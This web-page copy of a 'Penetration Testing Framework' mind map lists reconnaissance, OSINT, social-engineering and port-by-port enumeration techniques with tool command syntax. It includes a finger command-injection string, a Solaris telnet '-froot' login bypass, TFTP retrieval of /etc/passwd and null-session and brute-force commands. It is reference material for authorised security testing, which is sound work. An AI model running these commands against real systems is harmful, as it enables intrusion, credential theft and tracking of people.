Penetration Testing Framework 0.58

Get Started. It's Free
or sign up with your email address
Rocket clouds
Penetration Testing Framework 0.58 by Mind Map: Penetration Testing Framework 0.58

1. inurl:Citrix/AccessPlatform/auth/login.aspx

2. X11 port 6000^ open

2.1. X11 Enumeration

2.1.1. List open windows

2.1.2. Authentication Method

2.1.2.1. Xauth

2.1.2.2. Xhost

2.2. X11 Exploitation

2.2.1. xwd

2.2.1.1. xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm

2.2.2. Keystrokes

2.2.2.1. Received

2.2.2.2. Transmitted

2.2.3. Screenshots

2.2.4. xhost +

2.3. Examine Configuration Files

2.3.1. /etc/Xn.hosts

2.3.2. /usr/lib/X11/xdm

2.3.2.1. Untitled

2.3.3. /usr/lib/X11/xdm/xsession

2.3.4. /usr/lib/X11/xdm/xsession-remote

2.3.5. /usr/lib/X11/xdm/xsession.0

2.3.6. /usr/lib/X11/xdm/xdm-config

2.3.6.1. DisplayManager*authorize:on

3. pwdump [-h][-o][-u][-p] machineName

4. Nabil contributed the AS/400 section.

5. Client Side Security

6. Back end files

6.1. .exe / .txt / .doc / .ppt / .pdf / .vbs / .pl / .sh / .bat / .sql / .xls / .mdb / .conf

7. Set objShell = CreateObject("WScript.Shell")

8. Check visible areas for sensitive information.

9. InitialProgram=c:\windows\system32\cmd.exe

10. txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c: \hostlist.txt

11. http://secunia.com/advisories/search/?search=citrix

12. Pre-Inspection Visit - template

13. Network Footprinting (Reconnaissance) The tester would attempt to gather as much information as possible about the selected network. Reconnaissance can take two forms i.e. active and passive. A passive attack is always the best starting point as this would normally defeat intrusion detection systems and other forms of protection etc. afforded to the network. This would usually involve trying to discover publicly available information by utilising a web browser and visiting newsgroups etc. An active form would be more intrusive and may show up in audit logs and may take the form of an attempted DNS zone transfer or a social engineering type of attack.

13.1. Untitled

13.1.1. Authoratitive Bodies

13.1.1.1. IANA - Internet Assigned Numbers Authority

13.1.1.2. ICANN - Internet Corporation for Assigned Names and Numbers.

13.1.1.3. NRO - Number Resource Organisation

13.1.1.4. RIR - Regional Internet Registry

13.1.1.4.1. AFRINIC - African Network Information Centre

13.1.1.4.2. APNIC - Asia Pacific Network Information Centre

13.1.1.4.3. ARIN - American Registry for Internet Numbers

13.1.1.4.4. LACNIC - Latin America & Caribbean Network Information Centre

13.1.1.4.5. RIPE - Reseaux IP Européens—Network Coordination Centre

13.1.2. Websites

13.1.2.1. Central Ops

13.1.2.1.1. Domain Dossier

13.1.2.1.2. Email Dossier

13.1.2.2. DNS Stuff

13.1.2.2.1. Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries.

13.1.2.3. Fixed Orbit

13.1.2.3.1. Autonomous System lookups and other online tools available.

13.1.2.4. Geektools

13.1.2.5. IP2Location

13.1.2.5.1. Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information.

13.1.2.6. Kartoo

13.1.2.6.1. Metasearch engine that visually presents its results.

13.1.2.7. MyIPNeighbors.com

13.1.2.7.1. Excellent site that gives you details of shared domains on the IP queried/ conversely IP to DNS resolution

13.1.2.8. My-IP-Neighbors.com

13.1.2.8.1. Excellent site that can be used if the above is down

13.1.2.9. myipneighbors.net

13.1.2.10. Netcraft

13.1.2.10.1. Online search tool allowing queries for host information.

13.1.2.11. Passive DNS Replication

13.1.2.11.1. Finds shared domains based on supplied IP addresses

13.1.2.11.2. Note: - Website utilised by nmap hostmap.nse script

13.1.2.12. Robtex

13.1.2.12.1. Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results with pointers, A, MX records and AS connectivity displayed.

13.1.2.12.2. Note: - Can be unreliable with old entries (Use CentralOps to verify)

13.1.2.13. Traceroute.org

13.1.2.13.1. Website listing a large number links to online traceroute resources.

13.1.2.14. Wayback Machine

13.1.2.14.1. Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.

13.1.2.15. Whois.net

13.1.3. Tools

13.1.3.1. Cheops-ng

13.1.3.2. Country whois

13.1.3.3. Domain Research Tool

13.1.3.4. Firefox Plugins

13.1.3.4.1. AS Number

13.1.3.4.2. Shazou

13.1.3.4.3. Firecat Suite

13.1.3.5. Gnetutil

13.1.3.6. Goolag Scanner

13.1.3.7. Greenwich

13.1.3.8. Maltego

13.1.3.9. GTWhois

13.1.3.10. Sam Spade

13.1.3.11. Smart whois

13.1.3.12. SpiderFoot

13.2. Internet Search

13.2.1. General Information

13.2.1.1. Web Investigator

13.2.1.2. Tracesmart

13.2.1.3. Friends Reunited

13.2.1.4. Ebay - profiles etc.

13.2.2. Financial

13.2.2.1. EDGAR - Company information, including real-time filings. US

13.2.2.2. Google Finance - General Finance Portal

13.2.2.3. Hoovers - Business Intelligence, Insight and Results. US and UK

13.2.2.4. Companies House UK

13.2.2.5. Land Registry UK

13.2.3. Phone book/ Electoral Role Information

13.2.3.1. 123people

13.2.3.1.1. http://www.123people.co.uk/s/firstname+lastname/world

13.2.3.2. 192.com

13.2.3.2.1. Electoral Role Search. UK

13.2.3.3. 411

13.2.3.3.1. Online White Pages and Yellow Pages. US

13.2.3.4. Untitled

13.2.3.4.1. Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US

13.2.3.5. BT.com. UK

13.2.3.5.1. Residential

13.2.3.5.2. Business

13.2.3.6. Pipl

13.2.3.6.1. Untitled

13.2.3.6.2. http://pipl.com/search/?Email=john%40example.com&CategoryID=4&Interface=1

13.2.3.6.3. http://pipl.com/search/?Username=????&CategoryID=5&Interface=1

13.2.3.7. Spokeo

13.2.3.7.1. http://www.spokeo.com/user?q=domain_name

13.2.3.7.2. http://www.spokeo.com/user?q=email_address

13.2.3.8. Yasni

13.2.3.8.1. http://www.yasni.co.uk/index.php?action=search&search=1&sh=&name=firstname+lastname&filter=Keyword

13.2.3.9. Zabasearch

13.2.3.9.1. People Search Engine. US

13.2.4. Generic Web Searching

13.2.4.1. Code Search

13.2.4.2. Forum Entries

13.2.4.3. Google Hacking Database

13.2.4.4. Google

13.2.4.4.1. Email Addresses

13.2.4.4.2. Contact Details

13.2.4.5. Newsgroups/forums

13.2.4.6. Blog Search

13.2.4.6.1. Yammer

13.2.4.6.2. Google Blog Search

13.2.4.6.3. Technorati

13.2.4.6.4. Jaiku

13.2.4.6.5. Present.ly

13.2.4.6.6. Twitter Network Browser

13.2.4.7. Search Engine Comparison/ Aggregator Sites

13.2.4.7.1. Clusty

13.2.4.7.2. Grokker

13.2.4.7.3. Zuula

13.2.4.7.4. Exalead

13.2.4.7.5. Delicious

13.2.5. Metadata Search

13.2.5.1. Untitled

13.2.5.1.1. MetaData Visualisation Sites

13.2.5.1.2. Tools

13.2.5.1.3. Wikipedia Metadata Search

13.2.6. Social/ Business Networks

13.2.6.1. Untitled

13.2.6.1.1. Africa

13.2.6.1.2. Australia

13.2.6.1.3. Belgium

13.2.6.1.4. Holland

13.2.6.1.5. Hungary

13.2.6.1.6. Iran

13.2.6.1.7. Japan

13.2.6.1.8. Korea

13.2.6.1.9. Poland

13.2.6.1.10. Russia

13.2.6.1.11. Sweden

13.2.6.1.12. UK

13.2.6.1.13. US

13.2.6.1.14. Assorted

13.2.7. Resources

13.2.7.1. OSINT

13.2.7.2. International Directory of Search Engines

13.3. DNS Record Retrieval from publically available servers

13.3.1. Types of Information Records

13.3.1.1. SOA Records - Indicates the server that has authority for the domain.

13.3.1.2. MX Records - List of a host’s or domain’s mail exchanger server(s).

13.3.1.3. NS Records - List of a host’s or domain’s name server(s).

13.3.1.4. A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS.

13.3.1.5. PTR Records - Lists a host’s domain name, host identified by its IP address.

13.3.1.6. SRV Records - Service location record.

13.3.1.7. HINFO Records - Host information record with CPU type and operating system.

13.3.1.8. TXT Records - Generic text record.

13.3.1.9. CNAME - A host’s canonical name allows additional names/ aliases to be used to locate a computer.

13.3.1.10. RP - Responsible person for the domain.

13.3.2. Database Settings

13.3.2.1. Version.bind

13.3.2.2. Serial

13.3.2.3. Refresh

13.3.2.4. Retry

13.3.2.5. Expiry

13.3.2.6. Minimum

13.3.3. Sub Domains

13.3.4. Internal IP ranges

13.3.4.1. Reverse DNS for IP Range

13.3.5. Zone Transfer

13.4. Social Engineering

13.4.1. Remote

13.4.1.1. Phone

13.4.1.1.1. Scenarios

13.4.1.1.2. Results

13.4.1.1.3. Contact Details

13.4.1.2. Email

13.4.1.2.1. Scenarios

13.4.1.2.2. Software

13.4.1.2.3. Results

13.4.1.2.4. Contact Details

13.4.1.3. Other

13.4.2. Local

13.4.2.1. Personas

13.4.2.1.1. Name

13.4.2.1.2. Phone

13.4.2.1.3. Email

13.4.2.1.4. Business Cards

13.4.2.2. Contact Details

13.4.2.2.1. Name

13.4.2.2.2. Phone number

13.4.2.2.3. Email

13.4.2.2.4. Room number

13.4.2.2.5. Department

13.4.2.2.6. Role

13.4.2.3. Scenarios

13.4.2.3.1. New IT employee

13.4.2.3.2. Fire Inspector

13.4.2.4. Results

13.4.2.5. Maps

13.4.2.5.1. Satalitte Imagery

13.4.2.5.2. Building layouts

13.4.2.6. Other

13.5. Dumpster Diving

13.5.1. Rubbish Bins

13.5.2. Contract Waste Removal

13.5.3. Ebay ex-stock sales i.e. HDD

13.6. Web Site copy

13.6.1. htttrack

13.6.2. teleport pro

13.6.3. Black Widow

14. Discovery & Probing. Enumeration can serve two distinct purposes in an assessment: OS Fingerprinting Remote applications being served. OS fingerprinting or TCP/IP stack fingerprinting is the process of determining the operating system being utilised on a remote host. This is carried out by analyzing packets received from the host in question. There are two distinct ways to OS fingerprint, actively (i.e. nmap) or passively (i.e. scanrand). Passive OS fingerprinting determines the remote OS utilising the packets received only and does not require any packets to be sent. Active OS fingerprinting is very noisy and requires packets to be sent to the remote host and waits for a reply, (or lack thereof). Disparate OS's respond differently to certain types of packet, (the response is governed by an RFC and any proprietary responses the vendor (notably Microsoft) has enabled within the system) and so custom packets may be sent. Remote applications being served on a host can be determined by an open port on that host. By port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.

14.1. Default Port Lists

14.1.1. Windows

14.1.2. *nix

14.2. Enumeration tools and techniques - The vast majority can be used generically, however, certain bespoke application require there own specific toolsets to be used. Default passwords are platform and vendor specific

14.2.1. General Enumeration Tools

14.2.1.1. nmap

14.2.1.1.1. nmap -n -A -PN -p- -T Agressive -iL nmap.targetlist -oX nmap.syn.results.xml

14.2.1.1.2. nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results

14.2.1.1.3. nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results

14.2.1.1.4. nmap -A -sS -PN -n --script:all ip_address --reason

14.2.1.1.5. grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list

14.2.1.2. netcat

14.2.1.2.1. nc -v -n IP_Address port

14.2.1.2.2. nc -v -w 2 -z IP_Address port_range/port_number

14.2.1.3. amap

14.2.1.3.1. amap -bqv 192.168.1.1 80

14.2.1.3.2. amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]

14.2.1.4. xprobe2

14.2.1.4.1. xprobe2 192.168.1.1

14.2.1.5. sinfp

14.2.1.5.1. ./sinfp.pl -i -p

14.2.1.6. nbtscan

14.2.1.6.1. nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)

14.2.1.7. hping

14.2.1.7.1. hping ip_address

14.2.1.8. scanrand

14.2.1.8.1. scanrand ip_address:all

14.2.1.9. unicornscan

14.2.1.9.1. unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/ CIDR_NET_MASK: S-E

14.2.1.10. netenum

14.2.1.10.1. netenum network/netmask timeout

14.2.1.11. fping

14.2.1.11.1. fping -a -d hostname/ (Network/Subnet_Mask)

14.2.2. Firewall Specific Tools

14.2.2.1. firewalk

14.2.2.1.1. firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]

14.2.2.2. ftester

14.2.2.2.1. host 1 ./ftestd -i eth0 -v host 2 ./ftest -f ftest.conf -v -d 0.01 then ./freport ftest.log ftestd.log

14.2.3. Default Passwords (Examine list)

14.2.3.1. Passwords A

14.2.3.2. Passwords B

14.2.3.3. Passwords C

14.2.3.4. Passwords D

14.2.3.5. Passwords E

14.2.3.6. Passwords F

14.2.3.7. Passwords G

14.2.3.8. Passwords H

14.2.3.9. Passwords I

14.2.3.10. Passwords J

14.2.3.11. Passwords K

14.2.3.12. Passwords L

14.2.3.13. Passwords M

14.2.3.14. Passwords N

14.2.3.15. Passwords O

14.2.3.16. Passwords P

14.2.3.17. Passwords R

14.2.3.18. Passwords S

14.2.3.19. Passwords T

14.2.3.20. Passwords U

14.2.3.21. Passwords V

14.2.3.22. Passwords W

14.2.3.23. Passwords X

14.2.3.24. Passwords Y

14.2.3.25. Passwords Z

14.2.3.26. Passwords (Numeric)

14.3. Active Hosts

14.3.1. Open TCP Ports

14.3.2. Closed TCP Ports

14.3.3. Open UDP Ports

14.3.4. Closed UDP Ports

14.3.5. Service Probing

14.3.5.1. SMTP Mail Bouncing

14.3.5.2. Banner Grabbing

14.3.5.2.1. Other

14.3.5.2.2. HTTP

14.3.5.2.3. HTTPS

14.3.5.2.4. SMTP

14.3.5.2.5. POP3

14.3.5.2.6. FTP

14.3.6. ICMP Responses

14.3.6.1. Type 3 (Port Unreachable)

14.3.6.2. Type 8 (Echo Request)

14.3.6.3. Type 13 (Timestamp Request)

14.3.6.4. Type 15 (Information Request)

14.3.6.5. Type 17 (Subnet Address Mask Request)

14.3.6.6. Responses from broadcast address

14.3.7. Source Port Scans

14.3.7.1. TCP/UDP 53 (DNS)

14.3.7.2. TCP 20 (FTP Data)

14.3.7.3. TCP 80 (HTTP)

14.3.7.4. TCP/UDP 88 (Kerberos)

14.3.8. Firewall Assessment

14.3.8.1. Firewalk

14.3.8.2. TCP/UDP/ICMP responses

14.3.9. OS Fingerprint

15. Enumeration

15.1. Daytime port 13 open

15.1.1. nmap nse script

15.1.1.1. daytime

15.2. FTP port 21 open

15.2.1. Fingerprint server

15.2.1.1. telnet ip_address 21 (Banner grab)

15.2.1.2. Run command ftp ip_address

15.2.1.3. [email protected]

15.2.1.4. Check for anonymous access

15.2.1.4.1. ftp ip_addressUsername: anonymous OR anonPassword: [email protected]

15.2.2. Password guessing

15.2.2.1. Hydra brute force

15.2.2.2. medusa

15.2.2.3. Brutus

15.2.3. Examine configuration files

15.2.3.1. ftpusers

15.2.3.2. ftp.conf

15.2.3.3. proftpd.conf

15.2.4. MiTM

15.2.4.1. pasvagg.pl

15.3. SSH port 22 open

15.3.1. Fingerprint server

15.3.1.1. telnet ip_address 22 (banner grab)

15.3.1.2. scanssh

15.3.1.2.1. scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask

15.3.2. Password guessing

15.3.2.1. ssh [email protected]_address

15.3.2.2. guess-who

15.3.2.2.1. ./b -l username -h ip_address -p 22 -2 < password_file_location

15.3.2.3. Hydra brute force

15.3.2.4. brutessh

15.3.2.5. Ruby SSH Bruteforcer

15.3.3. Examine configuration files

15.3.3.1. ssh_config

15.3.3.2. sshd_config

15.3.3.3. authorized_keys

15.3.3.4. ssh_known_hosts

15.3.3.5. .shosts

15.3.4. SSH Client programs

15.3.4.1. tunnelier

15.3.4.2. winsshd

15.3.4.3. putty

15.3.4.4. winscp

15.4. Telnet port 23 open

15.4.1. Fingerprint server

15.4.1.1. telnet ip_address

15.4.1.1.1. Common Banner ListOS/BannerSolaris 8/SunOS 5.8Solaris 2.6/SunOS 5.6Solaris 2.4 or 2.5.1/Unix(r) System V Release 4.0 (hostname)SunOS 4.1.x/SunOS Unix (hostname)FreeBSD/FreeBSD/i386 (hostname) (ttyp1)NetBSD/NetBSD/i386 (hostname) (ttyp1)OpenBSD/OpenBSD/i386 (hostname) (ttyp1)Red Hat 8.0/Red Hat Linux release 8.0 (Psyche)Debian 3.0/Debian GNU/Linux 3.0 / hostnameSGI IRIX 6.x/IRIX (hostname)IBM AIX 4.1.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.IBM AIX 4.2.x or 4.3.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.Nokia IPSO/IPSO (hostname) (ttyp0)Cisco IOS/User Access VerificationLivingston ComOS/ComOS - Livingston PortMaster

15.4.1.2. telnetfp

15.4.2. Password Attack

15.4.2.1. Untitled

15.4.2.2. Hydra brute force

15.4.2.3. Brutus

15.4.2.4. telnet -l "-froot" hostname (Solaris 10+)

15.4.3. Examine configuration files

15.4.3.1. /etc/inetd.conf

15.4.3.2. /etc/xinetd.d/telnet

15.4.3.3. /etc/xinetd.d/stelnet

15.5. Sendmail Port 25 open

15.5.1. Fingerprint server

15.5.1.1. telnet ip_address 25 (banner grab)

15.5.2. Mail Server Testing

15.5.2.1. Enumerate users

15.5.2.1.1. VRFY username (verifies if username exists - enumeration of accounts)

15.5.2.1.2. EXPN username (verifies if username is valid - enumeration of accounts)

15.5.2.2. Mail Spoof Test

15.5.2.2.1. HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT

15.5.2.3. Mail Relay Test

15.5.2.3.1. Untitled

15.5.3. Examine Configuration Files

15.5.3.1. sendmail.cf

15.5.3.2. submit.cf

15.6. DNS port 53 open

15.6.1. Fingerprint server/ service

15.6.1.1. host

15.6.1.1.1. host [-aCdlnrTwv ] [-c class ] [-N ndots ] [-R number ] [-t type ] [-W wait ] name [server ] -v verbose format -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR. -a Same as –t ANY. -l Zone transfer (if allowed). -f Save to a specified filename.

15.6.1.2. nslookup

15.6.1.2.1. nslookup [ -option ... ] [ host-to-find | - [ server ]]

15.6.1.3. dig

15.6.1.3.1. dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]

15.6.1.4. whois-h Use the named host to resolve the query -a Use ARIN to resolve the query -r Use RIPE to resolve the query -p Use APNIC to resolve the query -Q Perform a quick lookup

15.6.2. DNS Enumeration

15.6.2.1. Bile Suite

15.6.2.1.1. perl BiLE.pl [website] [project_name]

15.6.2.1.2. perl BiLE-weigh.pl [website] [input file]

15.6.2.1.3. perl vet-IPrange.pl [input file] [true domain file] [output file] <range>

15.6.2.1.4. perl vet-mx.pl [input file] [true domain file] [output file]

15.6.2.1.5. perl exp-tld.pl [input file] [output file]

15.6.2.1.6. perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]

15.6.2.1.7. perl qtrace.pl [ip_address_file] [output_file]

15.6.2.1.8. perl jarf-rev [subnetblock] [nameserver]

15.6.2.2. txdns

15.6.2.2.1. txdns -rt -t domain_name

15.6.2.2.2. txdns -x 50 -bb domain_name

15.6.2.3. nmap nse scripts

15.6.2.3.1. dns-random-srcport

15.6.2.3.2. dns-random-txid

15.6.2.3.3. dns-recursion

15.6.2.3.4. dns-zone-transfer

15.6.3. Examine Configuration Files

15.6.3.1. host.conf

15.6.3.2. resolv.conf

15.6.3.3. named.conf

15.7. TFTP port 69 open

15.7.1. TFTP Enumeration

15.7.1.1. tftp ip_address PUT local_file

15.7.1.2. tftp ip_address GET conf.txt (or other files)

15.7.1.3. Solarwinds TFTP server

15.7.1.4. tftp – i <IP> GET /etc/passwd (old Solaris)

15.7.2. TFTP Bruteforcing

15.7.2.1. TFTP bruteforcer

15.7.2.2. Cisco-Torch

15.8. Finger Port 79 open

15.8.1. User enumeration

15.8.1.1. finger 'a b c d e f g h' @example.com

15.8.1.2. finger [email protected]

15.8.1.3. finger [email protected]

15.8.1.4. finger [email protected]

15.8.1.5. finger [email protected]

15.8.1.6. finger **@example.com

15.8.1.7. finger [email protected]

15.8.1.8. finger @example.com

15.8.1.9. nmap nse script

15.8.1.9.1. finger

15.8.2. Command execution

15.8.2.1. finger "|/bin/[email protected]"

15.8.2.2. finger "|/bin/ls -a /@example.com"

15.8.3. Finger Bounce

15.8.3.1. finger [email protected]@victim

15.8.3.2. finger @[email protected]

15.9. Web Ports 80,8080 etc. open

15.9.1. Fingerprint server

15.9.1.1. Telnet ip_address port

15.9.1.2. Firefox plugins

15.9.1.2.1. All

15.9.1.2.2. Specific

15.9.2. Crawl website

15.9.2.1. lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source

15.9.2.2. httprint

15.9.2.3. Metagoofil

15.9.2.3.1. metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html

15.9.3. Web Directory enumeration

15.9.3.1. Nikto

15.9.3.1.1. nikto [-h target] [options]

15.9.3.2. DirBuster

15.9.3.3. Wikto

15.9.3.4. Goolag Scanner

15.9.4. Vulnerability Assessment

15.9.4.1. Manual Tests

15.9.4.1.1. Default Passwords

15.9.4.1.2. Install Backdoors

15.9.4.1.3. Method Testing

15.9.4.1.4. Upload Files

15.9.4.1.5. View Page Source

15.9.4.1.6. Input Validation Checks

15.9.4.1.7. Automated table and column iteration

15.9.4.2. Vulnerability Scanners

15.9.4.2.1. Acunetix

15.9.4.2.2. Grendelscan

15.9.4.2.3. NStealth

15.9.4.2.4. Obiwan III

15.9.4.2.5. w3af

15.9.4.3. Specific Applications/ Server Tools

15.9.4.3.1. Domino

15.9.4.3.2. Joomla

15.9.4.3.3. aspaudit.pl

15.9.4.3.4. Vbulletin

15.9.4.3.5. ZyXel

15.9.5. Proxy Testing

15.9.5.1. Burpsuite

15.9.5.2. Crowbar

15.9.5.3. Interceptor

15.9.5.4. Paros

15.9.5.5. Requester Raw

15.9.5.6. Suru

15.9.5.7. WebScarab

15.9.6. Examine configuration files

15.9.6.1. Generic

15.9.6.1.1. Examine httpd.conf/ windows config files

15.9.6.2. JBoss

15.9.6.2.1. JMX Console http://<IP>:8080/jmxconcole/

15.9.6.3. Joomla

15.9.6.3.1. configuration.php

15.9.6.3.2. diagnostics.php

15.9.6.3.3. joomla.inc.php

15.9.6.3.4. config.inc.php

15.9.6.4. Mambo

15.9.6.4.1. configuration.php

15.9.6.4.2. config.inc.php

15.9.6.5. Wordpress

15.9.6.5.1. setup-config.php

15.9.6.5.2. wp-config.php

15.9.6.6. ZyXel

15.9.6.6.1. /WAN.html (contains PPPoE ISP password)

15.9.6.6.2. /WLAN_General.html and /WLAN.html (contains WEP key)

15.9.6.6.3. /rpDyDNS.html (contains DDNS credentials)

15.9.6.6.4. /Firewall_DefPolicy.html (Firewall)

15.9.6.6.5. /CF_Keyword.html (Content Filter)

15.9.6.6.6. /RemMagWWW.html (Remote MGMT)

15.9.6.6.7. /rpSysAdmin.html (System)

15.9.6.6.8. /LAN_IP.html (LAN)

15.9.6.6.9. /NAT_General.html (NAT)

15.9.6.6.10. /ViewLog.html (Logs)

15.9.6.6.11. /rpFWUpload.html (Tools)

15.9.6.6.12. /DiagGeneral.html (Diagnostic)

15.9.6.6.13. /RemMagSNMP.html (SNMP Passwords)

15.9.6.6.14. /LAN_ClientList.html (Current DHCP Leases)

15.9.6.6.15. Config Backups

15.9.7. Examine web server logs

15.9.7.1. c:\winnt\system32\Logfiles\W3SVC1

15.9.7.1.1. awk -F " " '{print $3,$11} filename | sort | uniq

15.9.8. References

15.9.8.1. White Papers

15.9.8.1.1. Cross Site Request Forgery: An Introduction to a Common Web Application Weakness

15.9.8.1.2. Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity

15.9.8.1.3. Blind Security Testing - An Evolutionary Approach

15.9.8.1.4. Command Injection in XML Signatures and Encryption

15.9.8.1.5. Input Validation Cheat Sheet

15.9.8.1.6. SQL Injection Cheat Sheet

15.9.8.2. Books

15.9.8.2.1. Hacking Exposed Web 2.0

15.9.8.2.2. Hacking Exposed Web Applications

15.9.8.2.3. The Web Application Hacker's Handbook

15.9.9. Exploit Frameworks

15.9.9.1. Brute-force Tools

15.9.9.1.1. Acunetix

15.9.9.2. Metasploit

15.9.9.3. w3af

15.10. Portmapper port 111 open

15.10.1. rpcdump.py

15.10.1.1. rpcdump.py username:[email protected]_Address port/protocol (i.e. 80/HTTP)

15.10.2. rpcinfo

15.10.2.1. rpcinfo [options] IP_Address

15.11. NTP Port 123 open

15.11.1. NTP Enumeration

15.11.1.1. ntpdc -c monlist IP_ADDRESS

15.11.1.2. ntpdc -c sysinfo IP_ADDRESS

15.11.1.3. ntpq

15.11.1.3.1. host

15.11.1.3.2. hostname

15.11.1.3.3. ntpversion

15.11.1.3.4. readlist

15.11.1.3.5. version

15.11.2. Examine configuration files

15.11.2.1. ntp.conf

15.11.3. nmap nse script

15.11.3.1. ntp-info

15.12. NetBIOS Ports 135-139,445 open

15.12.1. NetBIOS enumeration

15.12.1.1. Enum

15.12.1.1.1. enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>

15.12.1.2. Null Session

15.12.1.2.1. net use \\192.168.1.1\ipc$ "" /u:""

15.12.1.3. Smbclient

15.12.1.3.1. smbclient -L //server/share password options

15.12.1.4. Superscan

15.12.1.4.1. Enumeration tab.

15.12.1.5. user2sid/sid2user

15.12.1.6. Winfo

15.12.2. NetBIOS brute force

15.12.2.1. Hydra

15.12.2.2. Brutus

15.12.2.3. Cain & Abel

15.12.2.4. getacct

15.12.2.5. NAT (NetBIOS Auditing Tool)

15.12.3. Examine Configuration Files

15.12.3.1. Smb.conf

15.12.3.2. lmhosts

15.13. SNMP port 161 open

15.13.1. Default Community Strings

15.13.1.1. public

15.13.1.2. private

15.13.1.3. cisco

15.13.1.3.1. cable-docsis

15.13.1.3.2. ILMI

15.13.2. MIB enumeration

15.13.2.1. Windows NT

15.13.2.1.1. .1.3.6.1.2.1.1.5 Hostnames

15.13.2.1.2. .1.3.6.1.4.1.77.1.4.2 Domain Name

15.13.2.1.3. .1.3.6.1.4.1.77.1.2.25 Usernames

15.13.2.1.4. .1.3.6.1.4.1.77.1.2.3.1.1 Running Services

15.13.2.1.5. .1.3.6.1.4.1.77.1.2.27 Share Information

15.13.2.2. Solarwinds MIB walk

15.13.2.3. Getif

15.13.2.4. snmpwalk

15.13.2.4.1. snmpwalk -v <Version> -c <Community string> <IP>

15.13.2.5. Snscan

15.13.2.6. Applications

15.13.2.6.1. ZyXel

15.13.2.7. nmap nse script

15.13.2.7.1. snmp-sysdescr

15.13.3. SNMP Bruteforce

15.13.3.1. onesixtyone

15.13.3.1.1. onesixytone -c SNMP.wordlist <IP>

15.13.3.2. cat

15.13.3.2.1. ./cat -h <IP> -w SNMP.wordlist

15.13.3.3. Solarwinds SNMP Brute Force

15.13.3.4. ADMsnmp

15.13.3.5. nmap nse script

15.13.3.5.1. snmp-brute

15.13.4. Examine SNMP Configuration files

15.13.4.1. snmp.conf

15.13.4.2. snmpd.conf

15.13.4.3. snmp-config.xml

15.14. LDAP Port 389 Open

15.14.1. ldap enumeration

15.14.1.1. ldapminer

15.14.1.1.1. ldapminer -h ip_address -p port (not required if default) -d

15.14.1.2. luma

15.14.1.2.1. Gui based tool

15.14.1.3. ldp

15.14.1.3.1. Gui based tool

15.14.1.4. openldap

15.14.1.4.1. ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]

15.14.1.4.2. ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]

15.14.1.4.3. ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]

15.14.1.4.4. ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]

15.14.1.4.5. ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]

15.14.2. ldap brute force

15.14.2.1. bf_ldap

15.14.2.1.1. bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,)

15.14.2.2. K0ldS

15.14.2.3. LDAP_Brute.pl

15.14.3. Examine Configuration Files

15.14.3.1. General

15.14.3.1.1. containers.ldif

15.14.3.1.2. ldap.cfg

15.14.3.1.3. ldap.conf

15.14.3.1.4. ldap.xml

15.14.3.1.5. ldap-config.xml

15.14.3.1.6. ldap-realm.xml

